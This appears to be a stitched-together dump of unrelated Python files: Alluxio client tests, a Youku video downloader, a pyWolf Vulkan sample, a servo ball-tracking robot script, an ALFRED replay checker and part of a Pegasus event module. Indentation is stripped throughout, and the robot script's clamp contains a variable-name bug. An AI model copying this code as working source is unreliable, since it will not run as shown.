message = random_str()
client, cleanup = setup_client(
streams_handler(file_id, 'read', output=message))
reader = client.read(file_id)
got = reader.read()
reader.close()
assert got == message
def test_write():
file_id = random_int()
message = random_str()
client, cleanup = setup_client(
streams_handler(file_id, 'write', input=message))
writer = client.write(file_id)
length = writer.write(message)
writer.close()
assert length == len(message)
def combined_handler(path, path_action, file_id, stream_action, path_input=None, path_output=None, stream_input=None, stream_output=None):
class _(BaseHTTPRequestHandler):
def do_POST(self):
request_path = urlparse(self.path).path
paths_path = alluxio.client._paths_url_path(path, path_action)
streams_path = alluxio.client._streams_url_path(
file_id, stream_action)
close_path = alluxio.client._streams_url_path(file_id, 'close')
if request_path == paths_path:
handle_paths_request(
self, path, path_action, input=path_input, output=path_output)
elif request_path == streams_path:
handle_streams_request(
self, file_id, stream_action, input=stream_input, output=stream_output)
elif request_path == close_path:
self.send_response(200)
return _
def test_open_read():
path = '/foo'
file_id = random_int()
message = random_str()
handler = combined_handler(
path, 'open-file', file_id, 'read', path_output=file_id, stream_output=message)
client, cleanup = setup_client(handler)
got = None
with client.open(path, 'r') as f:
got = f.read()
cleanup()
assert got == message
def test_open_write():
path = '/foo'
file_id = random_int()
message = random_str()
handler = combined_handler(path, 'create-file', file_id, 'write',
path_output=file_id, stream_input=message, stream_output=len(message))
client, cleanup = setup_client(handler)
written_len = None
with client.open(path, 'w') as f:
written_len = f.write(message)
cleanup()
assert written_len == len(message)
|
test_simple.py
|
import multiprocessing
import os
import time
from unittest import mock
import requests
from coworks.utils import import_attr
class TestClass:
@mock.patch.dict(os.environ, {"WORKSPACE": "local"})
@mock.patch.dict(os.environ, {"FLASK_RUN_FROM_CLI": "false"})
def test_run_simple(self, samples_docs_dir, unused_tcp_port):
app = import_attr('simple', 'app', cwd=samples_docs_dir)
server = multiprocessing.Process(target=run_server, args=(app, unused_tcp_port), daemon=True)
server.start()
counter = 1
time.sleep(counter)
while not server.is_alive() and counter < 3:
time.sleep(counter)
counter += 1
response = requests.get(f'http://localhost:{unused_tcp_port}/', headers={'Authorization': "token"})
assert response.text == "Hello world.\n"
server.terminate()
def run_server(app, port):
print(f"Server starting on port {port}")
app.run(host='localhost', port=port, use_reloader=False, debug=False)
|
youku.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__all__ = ['youku_download', 'youku_download_playlist', 'youku_download_by_id']
from ..common import *
import json
from random import randint
from time import time
import re
import sys
def trim_title(title):
title = title.replace(' - 视频 - 优酷视频 - 在线观看', '')
title = title.replace(' - 专辑 - 优酷视频', '')
title = re.sub(r'—([^—]+)—优酷网,视频高清在线观看', '', title)
return title
def find_video_id_from_url(url):
patterns = [r'^http://v.youku.com/v_show/id_([\w=]+).html',
r'^http://player.youku.com/player.php/sid/([\w=]+)/v.swf',
r'^loader\.swf\?VideoIDS=([\w=]+)',
r'^([\w=]+)$']
return r1_of(patterns, url)
def find_video_id_from_show_page(url):
return re.search(r'<a class="btnShow btnplay.*href="([^"]+)"', get_html(url)).group(1)
def youku_url(url):
id = find_video_id_from_url(url)
if id:
return 'http://v.youku.com/v_show/id_%s.html' % id
if re.match(r'http://www.youku.com/show_page/id_\w+.html', url):
return find_video_id_from_show_page(url)
if re.match(r'http://v.youku.com/v_playlist/\w+.html', url):
return url
return None
def parse_video_title(url, page):
if re.search(r'v_playlist', url):
# if we are playing a viedo from play list, the meta title might be incorrect
title = r1_of([r'<div class="show_title" title="([^"]+)">[^<]', r'<title>([^<>]*)</title>'], page)
else:
title = r1_of([r'<div class="show_title" title="([^"]+)">[^<]', r'<meta name="title" content="([^"]*)"'], page)
assert title
title = trim_title(title)
if re.search(r'v_playlist', url) and re.search(r'-.*\S+', title):
title = re.sub(r'^[^-]+-\s*', '', title) # remove the special name from title for playlist video
title = re.sub(r'—专辑:.*', '', title) # remove the special name from title for playlist video
title = unescape_html(title)
subtitle = re.search(r'<span class="subtitle" id="subtitle">([^<>]*)</span>', page)
if subtitle:
subtitle = subtitle.group(1).strip()
if subtitle == title:
subtitle = None
if subtitle:
title += '-' + subtitle
return title
def parse_playlist_title(url, page):
if re.search(r'v_playlist', url):
# if we are playing a video from play list, the meta title might be incorrect
title = re.search(r'<title>([^<>]*)</title>', page).group(1)
else:
title = re.search(r'<meta name="title" content="([^"]*)"', page).group(1)
title = trim_title(title)
if re.search(r'v_playlist', url) and re.search(r'-.*\S+', title):
title = re.sub(r'^[^-]+-\s*', '', title)
title = re.sub(r'^.*—专辑:《(.+)》', r'\1', title)
title = unescape_html(title)
return title
def parse_page(url):
url = youku_url(url)
page = get_html(url)
id2 = re.search(r"var\s+videoId2\s*=\s*'(\S+)'", page).group(1)
title = parse_video_title(url, page)
return id2, title
def get_info(videoId2):
return json.loads(get_html('http://v.youku.com/player/getPlayList/VideoIDS/' + videoId2 + '/timezone/+08/version/5/source/out/Sc/2'))
def find_video(info, stream_type = None):
#key = '%s%x' % (info['data'][0]['key2'], int(info['data'][0]['key1'], 16) ^ 0xA55AA5A5)
segs = info['data'][0]['segs']
types = segs.keys()
if not stream_type:
for x in ['hd2', 'mp4', 'flv']:
if x in types:
stream_type = x
break
else:
raise NotImplementedError()
assert stream_type in ('hd2', 'mp4', 'flv')
file_type = {'hd2': 'flv', 'mp4': 'mp4', 'flv': 'flv'}[stream_type]
seed = info['data'][0]['seed']
source = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/\\:._-1234567890")
mixed = ''
while source:
seed = (seed * 211 + 30031) & 0xFFFF
index = seed * len(source) >> 16
c = source.pop(index)
mixed += c
ids = info['data'][0]['streamfileids'][stream_type].split('*')[:-1]
vid = ''.join(mixed[int(i)] for i in ids)
sid = '%s%s%s' % (int(time() * 1000), randint(1000, 1999), randint(1000, 9999))
urls = []
for s in segs[stream_type]:
no = '%02x' % int(s['no'])
url = 'http://f.youku.com/player/getFlvPath/sid/%s_%s/st/%s/fileid/%s%s%s?K=%s&ts=%s' % (sid, no, file_type, vid[:8], no.upper(), vid[10:], s['k'], s['seconds'])
urls.append((url, int(s['size'])))
return urls
def file_type_of_url(url):
return str(re.search(r'/st/([^/]+)/', url).group(1))
def youku_download_by_id(id, title, output_dir = '.', stream_type = None, merge = True, info_only = False):
# Open Sogou proxy if required
if get_sogou_proxy() is not None:
server = sogou_proxy_server(get_sogou_proxy(), ostream=open(os.devnull, 'w'))
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
set_proxy(server.server_address)
info = get_info(id)
# Close Sogou proxy if required
if get_sogou_proxy() is not None:
server.shutdown()
unset_proxy()
urls, sizes = zip(*find_video(info, stream_type))
ext = file_type_of_url(urls[0])
total_size = sum(sizes)
print_info(site_info, title, ext, total_size)
if not info_only:
download_urls(urls, title, ext, total_size, output_dir, merge = merge)
def parse_playlist_videos(html):
return re.findall(r'id="A_(\w+)"', html)
def parse_playlist_pages(html):
m = re.search(r'<ul class="pages">.*?</ul>', html, flags = re.S)
if m:
urls = re.findall(r'href="([^"]+)"', m.group())
x1, x2, x3 = re.match(r'^(.*page_)(\d+)(_.*)$', urls[-1]).groups()
return ['http://v.youku.com%s%s%s?__rt=1&__ro=listShow' % (x1, i, x3) for i in range(2, int(x2) + 1)]
else:
return []
def parse_playlist(url):
html = get_html(url)
video_id = re.search(r"var\s+videoId\s*=\s*'(\d+)'", html).group(1)
show_id = re.search(r'var\s+showid\s*=\s*"(\d+)"', html).group(1)
list_url = 'http://v.youku.com/v_vpofficiallist/page_1_showid_%s_id_%s.html?__rt=1&__ro=listShow' % (show_id, video_id)
html = get_html(list_url)
ids = parse_playlist_videos(html)
for url in parse_playlist_pages(html):
ids.extend(parse_playlist_videos(get_html(url)))
return ids
def parse_vplaylist(url):
id = r1_of([r'^http://www.youku.com/playlist_show/id_(\d+)(?:_ascending_\d_mode_pic(?:_page_\d+)?)?.html',
r'^http://v.youku.com/v_playlist/f(\d+)o[01]p\d+.html',
r'^http://u.youku.com/user_playlist/pid_(\d+)_id_[\w=]+(?:_page_\d+)?.html'],
url)
assert id, 'not valid vplaylist url: ' + url
url = 'http://www.youku.com/playlist_show/id_%s.html' % id
n = int(re.search(r'<span class="num">(\d+)</span>', get_html(url)).group(1))
return ['http://v.youku.com/v_playlist/f%so0p%s.html' % (id, i) for i in range(n)]
def youku_download_playlist(url, output_dir='.', merge=True, info_only=False):
"""Downloads a Youku playlist.
"""
if re.match(r'http://www.youku.com/playlist_show/id_\d+(?:_ascending_\d_mode_pic(?:_page_\d+)?)?.html', url):
ids = parse_vplaylist(url)
elif re.match(r'http://v.youku.com/v_playlist/f\d+o[01]p\d+.html', url):
ids = parse_vplaylist(url)
elif re.match(r'http://u.youku.com/user_playlist/pid_(\d+)_id_[\w=]+(?:_page_\d+)?.html', url):
ids = parse_vplaylist(url)
elif re.match(r'http://www.youku.com/show_page/id_\w+.html', url):
url = find_video_id_from_show_page(url)
assert re.match(r'http://v.youku.com/v_show/id_([\w=]+).html', url), 'URL not supported as playlist'
ids = parse_playlist(url)
else:
ids = []
assert ids != []
title = parse_playlist_title(url, get_html(url))
title = filenameable(title)
output_dir = os.path.join(output_dir, title)
for i, id in enumerate(ids):
print('Processing %s of %s videos...' % (i + 1, len(ids)))
try:
id, title = parse_page(youku_url(id))
youku_download_by_id(id, title, output_dir=output_dir, merge=merge, info_only=info_only)
except:
continue
def youku_download(url, output_dir='.', merge=True, info_only=False):
"""Downloads Youku videos by URL.
"""
try:
youku_download_playlist(url, output_dir=output_dir, merge=merge, info_only=info_only)
except:
id, title = parse_page(url)
youku_download_by_id(id, title=title, output_dir=output_dir, merge=merge, info_only=info_only)
site_info = "Youku.com"
download = youku_download
download_playlist = youku_download_playlist
|
01_clear.py
|
import sys, os
#get path of script
_script_path = os.path.realpath(__file__)
pyWolfPath = os.path.dirname(_script_path)
if sys.platform == "linux" or sys.platform == "linux2":
print "Linux not tested yet"
elif sys.platform == "darwin":
print "OS X not tested yet"
elif sys.platform == "win32":
pyWolfPath = pyWolfPath + "\\..\\..\\..\\..\\bin\\x64\\Debug\\Win32\\"
if pyWolfPath != "" and (not pyWolfPath in sys.path):
sys.path.append(pyWolfPath)
import ctypes, threading, pyWolf
from PySide import QtGui, QtCore
from PySide.QtGui import *
from PySide.QtCore import *
screen_width = 800
screen_height = 600
class scene(QWidget):
def __init__(self, pContentPath, pLogPath, pAppName, parent = None):
super(scene, self).__init__(parent)
self.__exiting = False
self._game = pyWolf.framework.w_game(pContentPath, pLogPath, pAppName)
self._game.set_pre_init_callback(self.pre_init)
self._game.set_post_init_callback(self.post_init)
self._game.set_load_callback(self.load)
self._game.set_update_callback(self.update)
self._game.set_pre_render_callback(self.pre_render)
self._game.set_post_render_callback(self.post_render)
self._gDevice = None
self._viewport = pyWolf.graphics.w_viewport()
self._viewport_scissor = pyWolf.graphics.w_viewport_scissor()
self._draw_command_buffers = pyWolf.graphics.w_command_buffers()
self._draw_render_pass = pyWolf.graphics.w_render_pass()
self._draw_fence = pyWolf.graphics.w_fences()
self._draw_semaphore = pyWolf.graphics.w_semaphore()
def pre_init(self):
print "pre_init"
def post_init(self):
#get main graphics device
self._gDevice = self._game.get_graphics_device(0)
print self._gDevice.get_info()
print "post_init"
def load(self):
#initialize viewport
self._viewport.y = 0
self._viewport.width = screen_width
self._viewport.height = screen_height
self._viewport.minDepth = 0
self._viewport.maxDepth = 1
#initialize scissor of viewport
self._viewport_scissor.offset.x = 0
self._viewport_scissor.offset.y = 0
self._viewport_scissor.extent.width = screen_width
self._viewport_scissor.extent.height = screen_height
#load render pass which contains frame buffers
_render_pass_attachments = []
_output_window = self._gDevice.output_presentation_window
for _iter in _output_window.swap_chain_image_views:
# COLOR #DEPTH
_render_pass_attachments.append([_iter, _output_window.depth_buffer_image_view])
_hr = self._draw_render_pass.load(self._gDevice, self._viewport, self._viewport_scissor, _render_pass_attachments)
if _hr:
print "Error on loading render pass"
return
#create one semaphore for drawing
_hr = self._draw_semaphore.initialize(self._gDevice)
if _hr:
print "Error on initializing semaphore"
return
#create one fence for drawing
_hr = self._draw_fence.initialize(self._gDevice)
if _hr:
print "Error on initializing fence(s)"
return
#create one fence for drawing
number_of_swap_chains = self._gDevice.get_number_of_swap_chains()
_hr = self._draw_command_buffers.load(self._gDevice, number_of_swap_chains, pyWolf.graphics.w_command_buffer_level.PRIMARY)
if _hr:
print "Error on initializing draw command buffer(s)"
return
_hr = self.build_command_buffers()
if _hr:
print "Error on building draw command buffer(s)"
return
print "scene loaded successfully"
def build_command_buffers(self):
_hr = pyWolf.W_PASSED
_size = self._draw_command_buffers.get_commands_size()
for i in xrange(_size):
_cmd = self._draw_command_buffers.get_command_at(i)
_hr = self._draw_command_buffers.begin(i, pyWolf.graphics.w_command_buffer_usage_flag_bits.SIMULTANEOUS_USE_BIT)
if _hr:
print "Error on begining command buffer: " + str(i)
break
self._draw_render_pass.begin(i, _cmd, pyWolf.system.w_color.CORNFLOWER_BLUE(), 1.0, 0)
#place your draw code
self._draw_render_pass.end(_cmd)
_hr = self._draw_command_buffers.end(i)
if _hr:
print "Error on ending command buffer: " + str(i)
break
return _hr
def update(self, pGameTime):
print "fps: " + str(pGameTime.get_frames_per_second())
def pre_render(self, pGameTime):
_output_window = self._gDevice.output_presentation_window
_frame_index = _output_window.swap_chain_image_index
_wait_dst_stage_mask = [ pyWolf.graphics.w_pipeline_stage_flag_bits.COLOR_ATTACHMENT_OUTPUT_BIT ]
_wait_semaphores = [ _output_window.swap_chain_image_is_available_semaphore ]
_signal_semaphores = [ _output_window.rendering_done_semaphore ]
_cmd = self._draw_command_buffers.get_command_at(_frame_index)
_cmd_buffers = [_cmd ]
#reset draw fence
self._draw_fence.reset()
_hr = self._gDevice.submit(_cmd_buffers, self._gDevice.graphics_queue, _wait_dst_stage_mask, _wait_semaphores, _signal_semaphores, self._draw_fence)
if _hr:
print "Error on submit to graphics device"
return
_hr = self._draw_fence.wait()
if _hr:
print "Error on waiting for draw fence"
return
def post_render(self, pSuccessfullyRendered):
if pSuccessfullyRendered == False:
print "Rendered Unsuccessfully"
def run(self):
#run game
_window_info = pyWolf.system.w_window_info()
_window_info.width = self.width()
_window_info.height = self.height()
_window_info.v_sync_enable = False
_window_info.is_full_screen = False
_window_info.swap_chain_format = 44 # BGRA8Unorm in VULKAN
_window_info.cpu_access_swap_chain_buffer = False
# get window handle
pycobject_hwnd = self.winId()
#convert window handle as HWND to unsigned integer pointer for c++
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
int_hwnd = ctypes.pythonapi.PyCObject_AsVoidPtr(pycobject_hwnd)
_window_info.set_win_id(int_hwnd)
#initialize game
_map_info = (0, _window_info)
while True:
if self.__exiting:
self.release()
break
self._game.run(_map_info)
print "Game exited"
def showEvent(self, event):
#run in another thread
threading.Thread(target=self.run).start()
event.accept()
def closeEvent(self, event):
self.__exiting = True
event.accept()
def release(self):
self._draw_fence.release()
self._draw_fence = None
self._draw_semaphore.release()
self._draw_semaphore = None
self._draw_command_buffers.release()
self._draw_command_buffers = None
self._draw_render_pass.release()
self._draw_render_pass = None
self._game.release()
self._game = None
self._gDevice = None
self._viewport = None
self._viewport_scissor = None
if __name__ == '__main__':
# Create a Qt application
app = QApplication(sys.argv)
scene = scene(pyWolfPath + "..\\..\\..\\..\\content\\",
pyWolfPath,
"py_01_clear")
scene.resize(screen_width, screen_height)
scene.setWindowTitle('Wolf.Engine')
scene.show()
sys.exit(app.exec_())
|
11.robot_servo_ball.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
* @par Copyright (C): 2010-2020, Hunan CLB Tech
* @file robot_sevo_ball
* @version V1.0
* @details
* @par History
@author: zhulin
"""
from __future__ import division
import cv2
import time
import numpy as np
import Adafruit_PCA9685
import threading
#初始化PCA9685和舵机
servo_pwm = Adafruit_PCA9685.PCA9685() # 实例话舵机云台
# 设置舵机初始值,可以根据自己的要求调试
servo_pwm.set_pwm_freq(60) # 设置频率为60HZ
servo_pwm.set_pwm(5,0,350) # 底座舵机
servo_pwm.set_pwm(4,0,370) # 倾斜舵机
time.sleep(1)
#初始化摄像头并设置阙值
usb_cap = cv2.VideoCapture(0)
# 设置球体追踪的HSV值,上下限值
ball_yellow_lower=np.array([9,135,231])
ball_yellow_upper=np.array([31,255,255])
# 设置显示的分辨率,设置为320×240 px
usb_cap.set(3, 320)
usb_cap.set(4, 240)
#舵机云台的每个自由度需要4个变量
pid_thisError_x=500 #当前误差值
pid_lastError_x=100 #上一次误差值
pid_thisError_y=500
pid_lastError_y=100
pid_x=0
pid_y=0
# 舵机的转动角度
pid_Y_P = 280
pid_X_P = 300 #转动角度
pid_flag=0
# 机器人舵机旋转
def Robot_servo(X_P,Y_P):
servo_pwm.set_pwm(5,0,650-pid_X_P)
servo_pwm.set_pwm(4,0,650-pid_Y_P)
# 循环函数
while True:
ret,frame = usb_cap.read()
#高斯模糊处理
frame=cv2.GaussianBlur(frame,(5,5),0)
hsv= cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)
#ROI及找到形态学找到小球进行处理
mask=cv2.inRange(hsv,ball_yellow_lower,ball_yellow_upper) # 掩膜处理
mask=cv2.erode(mask,None,iterations=2)
mask=cv2.dilate(mask,None,iterations=2)
mask=cv2.GaussianBlur(mask,(3,3),0)
res=cv2.bitwise_and(frame,frame,mask=mask)
cnts=cv2.findContours(mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2] #发现小球
#当找到小球处理
if len(cnts)>0:
cap_cnt=max(cnts,key=cv2.contourArea)
(pid_x,pid_y),radius=cv2.minEnclosingCircle(cap_cnt)
cv2.circle(frame,(int(pid_x),int(pid_y)),int(radius),(255,0,255),2)
# 误差值处理
pid_thisError_x=pid_x-160
pid_thisError_y=pid_y-120
#PID控制参数
pwm_x = pid_thisError_x*3+1*(pid_thisError_x-pid_lastError_x)
pwm_y = pid_thisError_y*3+1*(pid_thisError_y-pid_lastError_y)
#迭代误差值操作
pid_lastError_x = pid_thisError_x
pid_lastError_y = pid_thisError_y
pid_XP=pwm_x/100
pid_YP=pwm_y/100
# pid_X_P pid_Y_P 为最终PID值
pid_X_P=pid_X_P-int(pid_XP)
pid_Y_P=pid_Y_P-int(pid_YP)
#限值舵机在一定的范围之内
if pid_X_P>670:
pid_X_P=650
if pid_X_P<0:
pid_X_P=0
if pid_Y_P>650:
pid_Y_P=650
if pid_X_P<0:
pid_Y_p=0
servo_tid=threading.Thread(target=Robot_servo,args=(pid_X_P,pid_Y_P)) # 多线程
servo_tid.setDaemon(True)
servo_tid.start() # 开启线程
cv2.imshow("MAKEROBO Robot", frame) # 显示图像
if cv2.waitKey(1)==119:
break
usb_cap.release()
cv2.destroyAllWindows()
|
replay_checks.py
|
import os
import sys
# sys.path.append(os.path.join(os.environ['ALFRED_ROOT']))
# sys.path.append(os.path.join(os.environ['ALFRED_ROOT'], 'gen'))
sys.path.append(os.path.join('/home/jiasenl/code/alfred'))
sys.path.append(os.path.join('/home/jiasenl/code/alfred', 'gen'))
import argparse
import json
import numpy as np
import shutil
import time
from env.thor_env import ThorEnv
from utils.replay_json import replay_json
import multiprocessing as mp
import time
JSON_FILENAME = "traj_data.json"
def parallel_replay_check(args):
procs = [mp.Process(target=replay_check, args=(args, thread_num)) for thread_num in range(args.num_threads)]
try:
for proc in procs:
proc.start()
time.sleep(0.1)
finally:
for proc in procs:
proc.join()
def replay_check(args, thread_num=0):
env = ThorEnv(x_display='0.%d' %(thread_num % args.total_gpu))
# replay certificate filenames
replay_certificate_filenames = ["replay.certificate.%d" % idx for idx in range(args.num_replays)]
# Clear existing failures in file recording.
if args.failure_filename is not None:
with open(args.failure_filename, 'w') as f:
f.write('')
continue_check = True
total_checks, total_failures, crash_fails, unsat_fails, json_fails, nondet_fails = 0, 0, 0, 0, 0, 0
errors = {} # map from error strings to counts, to be shown after every failure.
total_threads = args.total_gpu * args.num_threads
current_threads = args.gpu_id * args.num_threads + thread_num
while continue_check:
# Crawl the directory of trajectories and vet ones with no certificate.
failure_list = []
valid_dirs = []
count = 0
for dir_name, subdir_list, file_list in os.walk(args.data_path):
if "trial_" in dir_name and (not "raw_images" in dir_name) and (not "pddl_states" in dir_name):
json_file = os.path.join(dir_name, JSON_FILENAME)
if not os.path.isfile(json_file):
continue
# If we're just stripping certificates, do that and continue.
if args.remove_certificates:
for cidx in range(args.num_replays):
certificate_file = os.path.join(dir_name, replay_certificate_filenames[cidx])
if os.path.isfile(certificate_file):
os.system("rm %s" % certificate_file)
continue
if count % total_threads == current_threads:
valid_dirs.append(dir_name)
count += 1
print(len(valid_dirs))
np.random.shuffle(valid_dirs)
for ii, dir_name in enumerate(valid_dirs):
if not os.path.exists(dir_name):
continue
json_file = os.path.join(dir_name, JSON_FILENAME)
if not os.path.isfile(json_file):
continue
cidx = 0
certificate_file = os.path.join(dir_name, replay_certificate_filenames[cidx])
already_checked = False
while os.path.isfile(certificate_file):
cidx += 1
if cidx == args.num_replays:
already_checked = True
break
certificate_file = os.path.join(dir_name, replay_certificate_filenames[cidx])
if already_checked:
continue
print(ii)
if not os.path.isfile(certificate_file):
total_checks += 1. / args.num_replays
failed = False
with open(json_file) as f:
print("check %d/%d for file '%s'" % (cidx + 1, args.num_replays, json_file))
try:
traj_data = json.load(f)
env.set_task(traj_data, args, reward_type='dense')
except json.decoder.JSONDecodeError:
failed = True
json_fails += 1
if not failed:
steps_taken = None
try:
steps_taken = replay_json(env, json_file)
except Exception as e:
import traceback
traceback.print_exc()
failed = True
crash_fails += 1
if str(e) not in errors:
errors[str(e)] = 0
errors[str(e)] += 1
print("%%%%%%%%%%")
es = sum([errors[er] for er in errors])
print("\terrors (%d):" % es)
for er, v in sorted(errors.items(), key=lambda kv: kv[1], reverse=True):
# if v / es < 0.01: # stop showing below 1% of errors.
# break
print("\t(%.2f) (%d)\t%s" % (v / es, v, er))
print("%%%%%%%%%%")
if cidx > 1:
print("WARNING: replay that has succeeded before has failed at attempt %d"
% cidx)
nondet_fails += 1
if steps_taken is not None: # executed without crashing, so now we need to verify completion.
goal_satisfied = env.get_goal_satisfied()
if goal_satisfied:
with open(certificate_file, 'w') as f:
f.write('%d' % steps_taken)
else:
failed = True
unsat_fails += 1
print("Goal was not satisfied after execution!")
if failed:
# Mark one failure and count the remainder of checks for this instance into the total.
total_failures += 1
total_checks += args.num_replays - ((cidx + 1) / float(args.num_replays))
failure_list.append(json_file)
if args.failure_filename is not None:
with open(args.failure_filename, 'a') as f:
f.write("%s\n" % json_file)
# If we're deleting bad trajectories, do that here.
if args.move_failed_trajectories is not None:
print("Relocating failed trajectory '%s' to '%s'" %
(dir_name, os.path.join(args.move_failed_trajectories)))
try:
shutil.move(dir_name, args.move_failed_trajectories)
except shutil.Error as e:
print("WARNING: failed to perform move; error follows; deleting instead")
print(repr(e))
shutil.rmtree(dir_name)
if args.remove_failed_trajectories:
print("Removing failed trajectory '%s'" % dir_name)
shutil.rmtree(dir_name)
print("-------------------------")
print("Success Rate: %.2f/%.2f = %.3f" %
(total_checks - total_failures, total_checks,
float(total_checks - total_failures) / float(total_checks)))
if total_failures > 0:
print("Non-deterministic failure: %d/%d = %.3f" % (nondet_fails, total_failures,
float(nondet_fails) / total_failures))
print("Failures by crash: %d/%d = %.3f" % (crash_fails, total_failures,
float(crash_fails) / total_failures))
print("Failures by unsatisfied: %d/%d = %.3f" % (unsat_fails, total_failures,
float(unsat_fails) / total_failures))
print("Failures by json decode error: %d/%d = %.3f" % (json_fails, total_failures,
float(json_fails) / total_failures))
print("-------------------------")
if not args.in_parallel:
continue_check = False
else:
time.sleep(60)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', type=str, default="dataset/2.1.0",
help="where to look for the generated data")
parser.add_argument("--failure_filename", type=str, required=False,
help="where to write failed trajectory dirs as strings, if anywhere")
parser.add_argument("--remove_failed_trajectories", dest='remove_failed_trajectories', action='store_true',
help="delete trajectory trials if they fail replay")
parser.add_argument("--move_failed_trajectories", type=str, required=False,
help="if given, relocate failed trajectories to this directory")
parser.add_argument("--remove_certificates", dest='remove_certificates', action='store_true',
help="instead of vetting trajectories, remove all vetting certificates")
parser.add_argument("--in_parallel", dest='in_parallel', action='store_true',
help="whether to run this script with parallel generation scripts in mind")
parser.add_argument('--reward_config', default='../models/config/rewards.json')
parser.add_argument('--num_replays', type=int, default=1)
parser.add_argument('--gpu_id', type=int, default=0)
parser.add_argument('--total_gpu', type=int, default=2)
parser.add_argument('--num_threads', type=int, default=2)
args = parser.parse_args()
if args.num_threads > 1:
parallel_replay_check(args)
else:
replay_check(args)
|
event_output.py
|
"""
Functions for output pegasus-monitord events to various destinations.
"""
##
# Copyright 2007-2011 University Of Southern California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
import logging
import queue
import re
import socket
import ssl
import time
import traceback
import urllib.parse
from threading import Thread
from pegaflow import json
from pegaflow.db import connection, expunge
from pegaflow.db.dashboard_loader import DashboardLoader
from pegaflow.db.workflow_loader import WorkflowLoader
from pegaflow.netlogger import nlapi
from pegaflow.tools import properties, utils
log = logging.getLogger(__name__)
# Optional imports, only generate 'warnings' if they fail
bson = None
try:
import bson
except Exception:
log.info("cannot import BSON library, 'bson'")
amqp = None
try:
import pika as amqp
except Exception:
log.info("cannot import AMQP library")
# Event name-spaces
STAMPEDE_NS = "stampede."
DASHBOARD_NS = "dashboard."
def purge_wf_uuid_from_database(rundir, output_db):
"""
This function purges a workflow id from the output database.
"""
# PM-652 do nothing for sqlite
# DB is already rotated in pegasus-monitord
if output_db.lower().startswith("sqlite"):
return
# Parse the braindump file
wfparams = utils.slurp_braindb(rundir)
wf_uuid = wfparams.get("wf_uuid", None)
if wf_uuid is None:
return
expunge.delete_workflow(output_db, wf_uuid)
def purge_wf_uuid_from_dashboard_database(rundir, output_db):
"""
This function purges a workflow id from the output database.
"""
# Parse the braindump file
wfparams = utils.slurp_braindb(rundir)
wf_uuid = wfparams.get("wf_uuid", None)
if wf_uuid is None:
return
expunge.delete_dashboard_workflow(output_db, wf_uuid)
class OutputURL:
"""
Break output URL into named parts for easier handling.
"""
def __init__(self, url):
(
self.scheme,
self.netloc,
self.path,
self.params,
query,
frag,
) = urllib.parse.urlparse(url)
host_port = ""
user_pass = ""
if "@" in self.netloc:
user_pass, host_port = self.netloc.split("@", 1)
else:
host_port = self.netloc
if ":" in host_port:
self.host, portstr = host_port.split(":", 1)
self.port = int(portstr)
else:
self.host = self.netloc
self.port = None
if ":" in user_pass:
self.user, self.password = user_pass.split(":", 1)
class EventSink:
"""
Base class for an Event Sink.
"""
def __init__(self):
self._log = logging.getLogger(
"{}.{}".format(self.__module__, self.__class__.__name__)
)
# Set listing events handled to be kept consistent with dict in workflow loader
self._acceptedEvents = (
"stampede.wf.plan",
"stampede.wf.map.task_job",
"stampede.static.start",
"stampede.static.end",
"stampede.xwf.start",
"stampede.xwf.end",
"stampede.xwf.map.subwf_job",
"stampede.task.info",
"stampede.task.edge",
"stampede.job.info",
"stampede.job.edge",
"stampede.job_inst.pre.start",
"stampede.job_inst.pre.term",
"stampede.job_inst.pre.end",
"stampede.job_inst.submit.start",
"stampede.job_inst.submit.end",
"stampede.job_inst.held.start",
"stampede.job_inst.held.end",
"stampede.job_inst.main.start",
"stampede.job_inst.main.term",
"stampede.job_inst.main.end",
"stampede.job_inst.post.start",
"stampede.job_inst.post.term",
"stampede.job_inst.post.end",
"stampede.job_inst.host.info",
"stampede.job_inst.image.info",
"stampede.job_inst.abort.info",
"stampede.job_inst.grid.submit.start",
"stampede.job_inst.grid.submit.end",
"stampede.job_inst.globus.submit.start",
"stampede.job_inst.globus.submit.end",
"stampede.job_inst.tag",
"stampede.job_inst.composite",
"stampede.inv.start",
"stampede.inv.end",
"stampede.static.meta.start",
"stampede.xwf.meta",
"stampede.task.meta",
"stampede.rc.meta",
"stampede.int.metric",
"stampede.rc.pfn",
"stampede.wf.map.file",
"stampede.static.meta.end",
"stampede.task.monitoring",
)
def send(self, event, kw):
"""
Clients call this function to send an event to the sink.
"""
def close(self):
"""
Clients call this function to close the output to this sink.
"""
def flush(self):
"Clients call this to flush events to the sink"
class DBEventSink(EventSink):
"""
Write wflow event logs to database via loader
"""
def __init__(
self,
dest,
db_stats=False,
namespace=STAMPEDE_NS,
props=None,
db_type=None,
backup=False,
**kw
):
self._namespace = namespace
# pick the right database loader based on prefix
if namespace == STAMPEDE_NS:
self._db = WorkflowLoader(
dest,
perf=db_stats,
batch=True,
props=props,
db_type=db_type,
backup=backup,
)
elif namespace == DASHBOARD_NS:
self._db = DashboardLoader(
dest,
perf=db_stats,
batch=True,
props=props,
db_type=db_type,
backup=backup,
)
else:
raise ValueError("Unknown namespace specified '%s'" % (namespace))
super().__init__()
def send(self, event, kw):
self._log.trace("send.start event=%s", event)
d = {"event": self._namespace + event}
for k, v in kw.items():
d[k.replace("__", ".")] = v
self._db.process(d)
self._log.trace("send.end event=%s", event)
def close(self):
self._log.trace("close.start")
self._db.finish()
self._log.trace("close.end")
def flush(self):
self._db.flush()
class FileEventSink(EventSink):
"""
Write wflow event logs to a file.
"""
def __init__(self, path, restart=False, encoder=None, **kw):
super().__init__()
if restart:
self._output = open(path, "w", 1)
else:
self._output = open(path, "a", 1)
self._encoder = encoder
